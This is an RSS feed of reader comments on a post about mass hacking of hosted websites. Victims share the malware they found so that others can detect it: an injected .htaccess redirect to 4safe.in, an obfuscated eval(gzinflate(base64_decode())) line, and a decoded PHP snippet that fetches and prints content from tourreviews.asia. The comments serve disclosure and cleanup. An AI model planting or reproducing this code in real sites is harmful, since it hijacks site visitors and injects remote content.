<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Media Temple, WordPress, Mass Hacking</title>
	<atom:link href="http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/</link>
	<description>Take your WordPress skills to the next level.</description>
	<lastBuildDate>Sat, 11 Feb 2012 16:22:22 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: DavidP</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-3214</link>
		<dc:creator>DavidP</dc:creator>
		<pubDate>Tue, 26 Jan 2010 04:35:09 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-3214</guid>
		<description>Sorry nurmaler, the cases of this infection on Rackspace Cloud have gone up every week. Yet Rackspace wont crawl out from the rock they are hiding under and admit there is a problem with their infrastructure. Moving site off RSC for good. Bunch of deceitful people that run that place.</description>
		<content:encoded><![CDATA[<p>Sorry nurmaler, the cases of this infection on Rackspace Cloud have gone up every week. Yet Rackspace wont crawl out from the rock they are hiding under and admit there is a problem with their infrastructure. Moving site off RSC for good. Bunch of deceitful people that run that place.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: nurmaler</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2865</link>
		<dc:creator>nurmaler</dc:creator>
		<pubDate>Tue, 22 Dec 2009 00:48:55 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2865</guid>
		<description>DavidP,
Have you heard back from Rackspcae on this.
I am just finding that 4-5 of my sites are identically infected (b1 tag pointing  to data.js)
Any work on this site that it&#039;s pointing to being able to collect personal information such as credit card numbers?
Thanks,
~nurmaler</description>
		<content:encoded><![CDATA[<p>DavidP,<br />
Have you heard back from Rackspcae on this.<br />
I am just finding that 4-5 of my sites are identically infected (b1 tag pointing  to data.js)<br />
Any work on this site that it&#8217;s pointing to being able to collect personal information such as credit card numbers?<br />
Thanks,<br />
~nurmaler</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Chris Coyier</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2850</link>
		<dc:creator>Chris Coyier</dc:creator>
		<pubDate>Sun, 20 Dec 2009 14:16:57 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2850</guid>
		<description>Thanks for all the detailed info Jay. It will be nice to have this stuff available for reference.</description>
		<content:encoded><![CDATA[<p>Thanks for all the detailed info Jay. It will be nice to have this stuff available for reference.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: JayM</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2846</link>
		<dc:creator>JayM</dc:creator>
		<pubDate>Sat, 19 Dec 2009 23:11:02 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2846</guid>
		<description>One last thing: according to my host, the ip address of the hacker was &lt;code&gt;188.120.226.4&lt;/code&gt; which is in Russia.

The range of ip&#039;s from this provider is &lt;code&gt;188.120.224.0 - 188.120.231.255&lt;/code&gt;

I have added this range to my blocked list, I would really like to know if all of the other instances were related to this same range.

I doubt this represents the true address the hacker (or hack-bot) was at, but if anyone else has something similar, it might be of some use: either to include in a rejection range or for others to review their logs in case they had modifications made that they aren&#039;t yet aware of.</description>
		<content:encoded><![CDATA[<p>One last thing: according to my host, the ip address of the hacker was <code>188.120.226.4</code> which is in Russia.</p>
<p>The range of ip&#8217;s from this provider is <code>188.120.224.0 - 188.120.231.255</code></p>
<p>I have added this range to my blocked list, I would really like to know if all of the other instances were related to this same range.</p>
<p>I doubt this represents the true address the hacker (or hack-bot) was at, but if anyone else has something similar, it might be of some use: either to include in a rejection range or for others to review their logs in case they had modifications made that they aren&#8217;t yet aware of.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: JayM</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2845</link>
		<dc:creator>JayM</dc:creator>
		<pubDate>Sat, 19 Dec 2009 23:00:41 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2845</guid>
		<description>Sorry - it looks like the &lt;code&gt;Pagecode();&lt;/code&gt; got filtered out so I am reformatting it:

The php files had been modified to include a line that started with &quot;&lt;code&gt;PageCode();&lt;/code&gt;&quot;
followed by a php directive and this code:

&lt;code&gt;eval(gzinflate(base64_decode(&#039;jVDLcoIwFN13pj/Rle4QVCbT6QIixKCiglzUTYc3SCJM0xbw6xttP6Dbe943+47YKI5ENp++p1nSpNnoxSEdorxU0qUxXw9IiTUYEg5qFIKWDLMyUVm5Vvs25p+3TYVEFM4+1lezSTDVKWGc4pJlS4/FV7eN1VkeE1SeCdQr7FzSoyNoVbfZYLi48i4RNhAl7iThfS592hQX7XYwH7yj5rKUoE7e6pNaCGq5ENT9LrC9HCzmegECwF2xuRn/0gQ1BADOFmzHPDCXeEAFXVhSK7vw3w6JCnKvqazwvVtX7CfgHyy0BxtJn05Q7InVQRTOkhY7/y9Thek53DQOcZs7dpL/im10kbtvZ//Ro91qiswAIf11qUVROOkkXku8olXPo7Bnq7u3X+u5b3YJZ18pNg3J1Rf75u1lPH59fvoB&#039;)));&lt;/code&gt;

The php closing tag also appeared after the semicolon, but I am not including it here because I don&#039;t know if it is being filtered.</description>
		<content:encoded><![CDATA[<p>Sorry &#8211; it looks like the <code>Pagecode();</code> got filtered out so I am reformatting it:</p>
<p>The php files had been modified to include a line that started with &#8220;<code>PageCode();</code>&#8221;<br />
followed by a php directive and this code:</p>
<p><code>eval(gzinflate(base64_decode('jVDLcoIwFN13pj/Rle4QVCbT6QIixKCiglzUTYc3SCJM0xbw6xttP6Dbe943+47YKI5ENp++p1nSpNnoxSEdorxU0qUxXw9IiTUYEg5qFIKWDLMyUVm5Vvs25p+3TYVEFM4+1lezSTDVKWGc4pJlS4/FV7eN1VkeE1SeCdQr7FzSoyNoVbfZYLi48i4RNhAl7iThfS592hQX7XYwH7yj5rKUoE7e6pNaCGq5ENT9LrC9HCzmegECwF2xuRn/0gQ1BADOFmzHPDCXeEAFXVhSK7vw3w6JCnKvqazwvVtX7CfgHyy0BxtJn05Q7InVQRTOkhY7/y9Thek53DQOcZs7dpL/im10kbtvZ//Ro91qiswAIf11qUVROOkkXku8olXPo7Bnq7u3X+u5b3YJZ18pNg3J1Rf75u1lPH59fvoB')));</code></p>
<p>The php closing tag also appeared after the semicolon, but I am not including it here because I don&#8217;t know if it is being filtered.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: JayM</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2844</link>
		<dc:creator>JayM</dc:creator>
		<pubDate>Sat, 19 Dec 2009 22:52:36 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2844</guid>
		<description>I am hosted with inmotionhosting and have a drupal site and a dolphin site. The dolphin site was affected by the same hack. The exact compromises were the addition of a redirect to my .htaccess file and gzinflate base64 code that was added to three php files.

The .htaccess file was altered by the addition of the following lines:
&lt;code&gt;AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm&lt;/code&gt;

&lt;code&gt;RewriteEngine On&lt;/code&gt;
&lt;code&gt;RewriteOptions inherit&lt;/code&gt;
&lt;code&gt;RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]&lt;/code&gt;
&lt;code&gt;RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]&lt;/code&gt;
&lt;code&gt;RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]&lt;/code&gt;
&lt;code&gt;RewriteCond %{HTTP_REFERER} .*ing.*$ [NC,OR]&lt;/code&gt;
&lt;code&gt;RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]&lt;/code&gt;
&lt;code&gt;RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]&lt;/code&gt;
&lt;code&gt;RewriteRule .* http://4safe.in/in.cgi?4&amp;parameter=sf [R,L]&lt;/code&gt;

The php files had been modified to include the following code:
&lt;code&gt;PageCode();&lt;/code&gt;

This decodes to:
&lt;code&gt;$l=&quot;http://tourreviews.asia/links2/link.php&quot;; if (extension_loaded(&quot;curl&quot;)){&lt;/code&gt;
&lt;code&gt;$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);&lt;/code&gt;
&lt;code&gt;curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}&lt;/code&gt;
&lt;code&gt;else{$r=implode(&quot;&quot;,file($l));} print @$r;&lt;/code&gt;

Fortunately, my host caught the upload, reset my password, restored the original files and saved the modified ones so that I was able to view them.

Hopefully this information will be helpful to someone.</description>
		<content:encoded><![CDATA[<p>I am hosted with inmotionhosting and have a drupal site and a dolphin site. The dolphin site was affected by the same hack. The exact compromises were the addition of a redirect to my .htaccess file and gzinflate base64 code that was added to three php files.</p>
<p>The .htaccess file was altered by the addition of the following lines:<br />
<code>AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm</code></p>
<p><code>RewriteEngine On</code><br />
<code>RewriteOptions inherit</code><br />
<code>RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]</code><br />
<code>RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]</code><br />
<code>RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]</code><br />
<code>RewriteCond %{HTTP_REFERER} .*ing.*$ [NC,OR]</code><br />
<code>RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]</code><br />
<code>RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]</code><br />
<code>RewriteRule .* http://4safe.in/in.cgi?4&amp;amp;parameter=sf [R,L]</code></p>
<p>The php files had been modified to include the following code:<br />
<code>PageCode();</code></p>
<p>This decodes to:<br />
<code>$l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){</code><br />
<code>$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</code><br />
<code>curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}</code><br />
<code>else{$r=implode("",file($l));} print @$r;</code></p>
<p>Fortunately, my host caught the upload, reset my password, restored the original files and saved the modified ones so that I was able to view them.</p>
<p>Hopefully this information will be helpful to someone.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: DavidP</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2796</link>
		<dc:creator>DavidP</dc:creator>
		<pubDate>Sat, 12 Dec 2009 02:20:12 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2796</guid>
		<description>I am hosted with Rackspace Cloud and we have been under the same attack. Lots of people up in arms about their sites being hacked. In total I have found 5 sites of mine that have been attacked. Rackspace hasn&#039;t released any statements on the cause.

Most of us are seeing b1 tags injected into the bottom of the websites. These scripts point to a data.js file that tries to push you to another website. Some have seen other code injected into the body tags.</description>
		<content:encoded><![CDATA[<p>I am hosted with Rackspace Cloud and we have been under the same attack. Lots of people up in arms about their sites being hacked. In total I have found 5 sites of mine that have been attacked. Rackspace hasn&#8217;t released any statements on the cause.</p>
<p>Most of us are seeing b1 tags injected into the bottom of the websites. These scripts point to a data.js file that tries to push you to another website. Some have seen other code injected into the body tags.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ryan</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2795</link>
		<dc:creator>Ryan</dc:creator>
		<pubDate>Fri, 11 Dec 2009 19:41:13 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2795</guid>
		<description>It&#039;s just issue after issue after issue with those guys. MT&#039;s GS is like being on a monstrously large shared host with many users (and thus many opportunities for problems) as well as many delicate parts (due to the clustering) that sometimes fail. Why put up with this? Sure it&#039;s a nice back-end and everything&#039;s pretty and shiny, but isn&#039;t enough enough?

(And no I&#039;m not affiliated with any other host, I&#039;m just a disgruntled ex-MT/GS customer who had enough of my sites being constantly down.)</description>
		<content:encoded><![CDATA[<p>It&#8217;s just issue after issue after issue with those guys. MT&#8217;s GS is like being on a monstrously large shared host with many users (and thus many opportunities for problems) as well as many delicate parts (due to the clustering) that sometimes fail. Why put up with this? Sure it&#8217;s a nice back-end and everything&#8217;s pretty and shiny, but isn&#8217;t enough enough?</p>
<p>(And no I&#8217;m not affiliated with any other host, I&#8217;m just a disgruntled ex-MT/GS customer who had enough of my sites being constantly down.)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Scott D. @mediatemple</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2779</link>
		<dc:creator>Scott D. @mediatemple</dc:creator>
		<pubDate>Wed, 09 Dec 2009 16:41:56 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2779</guid>
		<description>Hello pko,

Our engineers are presently looking into this further. Please look to our System Status page for an incident update shortly. I can assure you we are taking these hacks very seriously.</description>
		<content:encoded><![CDATA[<p>Hello pko,</p>
<p>Our engineers are presently looking into this further. Please look to our System Status page for an incident update shortly. I can assure you we are taking these hacks very seriously.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pko</title>
		<link>http://digwp.com/2009/11/media-temple-wordpress-mass-hacking/#comment-2778</link>
		<dc:creator>pko</dc:creator>
		<pubDate>Wed, 09 Dec 2009 16:28:30 +0000</pubDate>
		<guid isPermaLink="false">http://digwp.com/?p=983#comment-2778</guid>
		<description>09 dec 09 Today i been hacked And all the sites on my gs service have the &lt;code&gt;index.htm&lt;/code&gt; &lt;code&gt;.html&lt;/code&gt; &lt;code&gt;.php&lt;/code&gt; changed to the hacker one. NO WORDPRESS NO DRUPAL, just plain html, maybe all our password are spreading in to the web now, there is some thing to do about ? thanks</description>
		<content:encoded><![CDATA[<p>09 dec 09 Today i been hacked And all the sites on my gs service have the <code>index.htm</code> <code>.html</code> <code>.php</code> changed to the hacker one. NO WORDPRESS NO DRUPAL, just plain html, maybe all our password are spreading in to the web now, there is some thing to do about ? thanks</p>
]]></content:encoded>
	</item>
</channel>
</rss>

